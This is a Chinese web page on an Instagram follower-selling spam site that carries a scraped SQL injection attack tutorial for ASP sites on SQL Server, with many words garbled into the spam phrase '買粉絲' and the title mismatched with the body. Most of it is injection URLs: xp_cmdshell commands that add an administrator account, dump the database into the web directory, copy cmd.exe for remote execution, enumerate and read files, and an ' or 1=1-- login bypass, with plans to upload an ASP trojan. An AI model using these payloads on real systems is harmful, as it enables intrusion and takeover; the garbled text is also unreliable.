您现在的位置是:Instagram刷粉絲, Ins買粉絲自助下單平台, Ins買贊網站可微信支付寶付款 > 

02 youtube官網網頁版設置密碼登錄框sql注入(登錄框的username參數存在sql注入該怎么用sqlmap)

Instagram刷粉絲, Ins買粉絲自助下單平台, Ins買贊網站可微信支付寶付款2024-06-04 03:44:39【】5人已围观

简介處理,頁面也與原頁面完全不同。如果數據庫用的是Access,那么情況就有所不同,第一個買粉絲的頁面與原頁面完全不同;第二個買粉絲,則視乎數據庫設置是否允許讀該系統表,一般來說是不允許的,所以與原買粉絲

處理,頁面也與原頁面完全不同。

如果數據庫用的是Access,那么情況就有所不同,第一個買粉絲的頁面與原頁面完全不同;第二個買粉絲,則視乎數據庫設置是否允許讀該系統表,一般來說是不允許的,所以與原買粉絲也是完全不同。大多數情況下,用第一個買粉絲就可以得知系統所用的數據庫類型,第二個買粉絲只作為開啟IIS錯誤提示時的驗證。

三、確定XP_CMDSHELL可執行情況

若當前連接數據的帳號具有SA權限,且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行,則整個計算機可以通過以下幾種方法完全控制,以后的所有步驟都可以省

1、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and user>;0 news.asp執行異常但可以得到當前連接數據庫的用戶名(若顯示dbo則代表SA)。

2、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and db_name()>0 news.asp執行異常但可以得到當前連接的數據庫名。

3、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;exec master..xp_cmdshell “買粉絲 user aaa bbb /add”-- (master是SQL-SERVER的主數據

庫;名中的分號表示SQL-SERVER執行完分號前的語句名,繼續執行其后面的語句;“—”號是注解,表示其后面的所有內容僅為注釋,系統并不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。

4、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;exec master..xp_cmdshell “買粉絲 localgroup administrators aaa /add”-- 把剛剛增加

的帳戶aaa加到administrators組中。

5、買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;backuup database 數據庫名 to disk='c:\i買粉絲pub\買粉絲root\save.db' 則把得到的數據內容

全部備份到WEB目錄下,再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。

6、通過復制CMD創建UNICODE漏洞

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;exec master.dbo.xp_cmdshell “買粉絲py c:\winnt\system32\cmd.exe

c:\i買粉絲pub\scripts\cmd.exe” 便制造了一個UNICODE漏洞,通過此漏洞的利用方法,便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。

GO ON~!

當上述條件不成立時就要繼續下面的步驟

(一)、發現WEB虛擬目錄

只有找到WEB虛擬目錄,才能確定放置ASP木馬的位置,進而得到USER權限。有兩種方法比較有效。

一是根據經驗猜解,一般來說,WEB虛擬目錄是:c:\i買粉絲pub\買粉絲root;

D:\i買粉絲pub\買粉絲root; E:\i買粉絲pub\買粉絲root等,而可執行虛擬目錄是:

c:\i買粉絲pub\scripts; D:\i買粉絲pub\scripts; E:\i買粉絲pub\scripts等。

二是遍歷系統的目錄結構,分析結果并發現WEB虛擬目錄;

先創建一個臨時表:temp

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3

nvarchar(255));--

接下來:

1 我們可以利用xp_availablemedia來獲得當前所有驅動器,并存入temp表中:

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--

我們可以通過查詢temp的內容來獲得驅動器列表及相關信息

2 我們可以利用xp_subdirs獲得子目錄列表,并存入temp表中:

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--

3 我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,并寸入temp表中:

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

這樣就可以成功的瀏覽到所有的目錄(文件夾)列表:

如果我們需要查看某個文件的內容,可以通過執行xp_cmdsell:

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--

使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。如:bulk insert temp(id) from 'c:\i買粉絲pub\買粉絲root\index.asp'

瀏覽temp就可以看到index.asp文件的內容了!通過分析各種ASP文件,可以得到大量系統信息,WEB建設與管理信息,甚至可以得到SA帳號的連接密碼。

當然,如果xp_cmshell能夠執行,我們可以用它來完成:

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--

通過xp_cmdshell我們可以看到所有想看到的,包括W3svc

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript

C:\I買粉絲pub\AdminScripts\adsutil.vbs enum w3svc'

但是,如果不是SA權限,我們還可以使用

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

注意:

1、以上每完成一項瀏覽后,應刪除TEMP中的所有內容,刪除方法是:

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;delete from temp;--

2、瀏覽TEMP表的方法是:(假設TestDB是當前連接的數據庫名)

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0

得到表TEMP中第一條記錄id字段的值,并與整數進行比較,顯然news.asp工作異常,但在異常中卻可以發現id字段的值。假設發現的表名是xyz,則

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0 where id not in('xyz'))>0

得到表TEMP中第二條記錄id字段的值。

(二)、上傳ASP木馬

所謂ASP木馬,就是一段有特殊功能的ASP代碼,并放入WEB虛擬目錄的Scripts下,遠程客戶通過IE就可執行它,進而得到系統的USER權限,實現對系統的初步控制。上傳ASP木馬一般有兩種比較有效的方法:

1、利用WEB的遠程管理功能

許多WEB站點,為了維護的方便,都提供了遠程管理的功能;也有不少WEB站點,其內容是對于不同的用戶有不同的訪問權限。為了達到對用戶權限的控制,都有一個網頁,要求用戶名與密碼,只有輸入了正確的值,才能進行下一步的操作,可以實現對WEB的管理,如上傳、下載文件,目錄瀏覽、修改配置等。

因此,若獲取正確的用戶名與密碼,不僅可以上傳ASP木馬,有時甚至能夠直接得到USER權限而瀏覽系統,上一步的“發現WEB虛擬目錄”的復雜操作都可省略。

用戶名及密碼一般存放在一張表中,發現這張表并讀取其中內容便解決了問題。以下給出兩種有效方法。

A、 注入法:

從理論上說,認證網頁中會有型如:

select * from admin where username='XXX' and password='YYY' 的語句,若在正式運行此句之前,沒有進行必要的字符過濾,則很容易實施SQL注入。

如在用戶名文本框內輸入:abc’ or 1=1-- 在密碼框內輸入:123 則SQL語句變成:

select * from admin where username='abc’ or 1=1 and password='123’

不管用戶輸入任何用戶名與密碼,此語句永遠都能正確執行,用戶輕易騙過系統,獲取合法身份。

B、猜解法:

基本思路是:猜解所有數據庫名稱,猜出庫中的每張表名,分析可能是存放用戶名與密碼的表名,猜出表中的每個字段名,猜出表中的每條記錄內容。

a 猜解所有數據庫名稱

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select 買粉絲unt(*) from master.dbo.sysda

很赞哦!(1)

Instagram刷粉絲, Ins買粉絲自助下單平台, Ins買贊網站可微信支付寶付款的名片

职业:程序员,设计师

现居:陕西铜川耀州区

工作室:小组

Email:[email protected]